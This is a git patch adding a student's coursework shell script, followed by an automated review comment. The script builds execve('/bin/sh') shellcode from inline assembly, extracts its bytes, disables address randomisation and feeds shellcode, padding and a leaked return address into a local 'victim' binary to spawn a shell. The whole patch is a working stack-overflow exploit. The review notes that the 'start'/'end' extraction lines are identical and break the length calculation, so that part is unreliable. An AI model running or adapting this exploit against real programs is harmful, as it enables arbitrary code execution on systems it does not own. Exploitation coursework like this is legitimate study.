From 29d4f26127ef8f3925df8437b41c89e3093d3508 Mon Sep 17 00:00:00 2001
From: Camil Staps
Date: Tue, 29 Dec 2015 21:59:09 +0100
Subject: Assignment 6

---
 CamilStaps-s4498062-Assignment-6/ex2.sh | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
 create mode 100755 CamilStaps-s4498062-Assignment-6/ex2.sh

(limited to 'CamilStaps-s4498062-Assignment-6/ex2.sh')

diff --git a/CamilStaps-s4498062-Assignment-6/ex2.sh b/CamilStaps-s4498062-Assignment-6/ex2.sh
new file mode 100755
index 0000000..0a86bf5
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-6/ex2.sh
@@ -0,0 +1,15 @@
+echo 'int main() {\n asm("\\\nneedle0: jmp there\\n\\\nhere: pop %rdi\\n\\\n xor %rax, %rax\\n\\\n movb $0x3b, %al\\n\\\n xor %rsi, %rsi\\n\\\n xor %rdx, %rdx\\n\\\n syscall\\n\\\nthere: call here\\n\\\n.string \\"/bin/sh\\"\\n\\\nneedle1: .octa 0xdeadbeef\\n\\\n ");\n}' > shell.c
+gcc shell.c
+
+start=`objdump -d a.out | grep ':' | cut -f 1 -d ' '`
+end=`objdump -d a.out | grep ':' | cut -f 1 -d ' '`
+start=$((0x$start-0x400000))
+end=$((0x$end-0x400000))
+l=$((end-start))
+while [ ! $((l % 32)) -eq 0 ]; do l=$((l+1)); done
+xxd -s0x`printf %x $start` -l$l -p a.out shellcode
+
+a=$(echo "Camil" | setarch `arch` -R ./victim | head -n1)
+a=$(printf %016x $a | tac -rs..)
+( ( cat shellcode ; printf "%0464d" 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim
+
-- 
cgit v1.2.3
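Review bot: The `start` and `end` assignments run the identical pipeline `objdump -d a.out | grep ':' | cut -f 1 -d ' '`, and since `grep ':'` matches every objdump line that contains a colon, each backtick substitution yields many lines, so `$((0x$start-0x400000))` is not a single hex literal and `l=$((end-start))` can never hold a meaningful length; whichever two distinct symbols were intended, that should be stated in a comment on those lines. The file also has no shebang, which matters because the first line relies on `echo` expanding `\n` — bash's builtin `echo` leaves it literal without `-e`, so the generated `shell.c` differs between `sh` and `bash`; `printf '%s\n' '…' > shell.c` or a quoted heredoc would make it deterministic. The backticks and the unquoted `$start`, `$l` and `$a` should become `$( … )` and quoted expansions, and `shellcheck` would flag each of these. `shell.c`, `a.out` and `shellcode` are written into the working directory and never removed; a `trap 'rm -f -- shell.c a.out shellcode' EXIT` near the top would keep reruns clean.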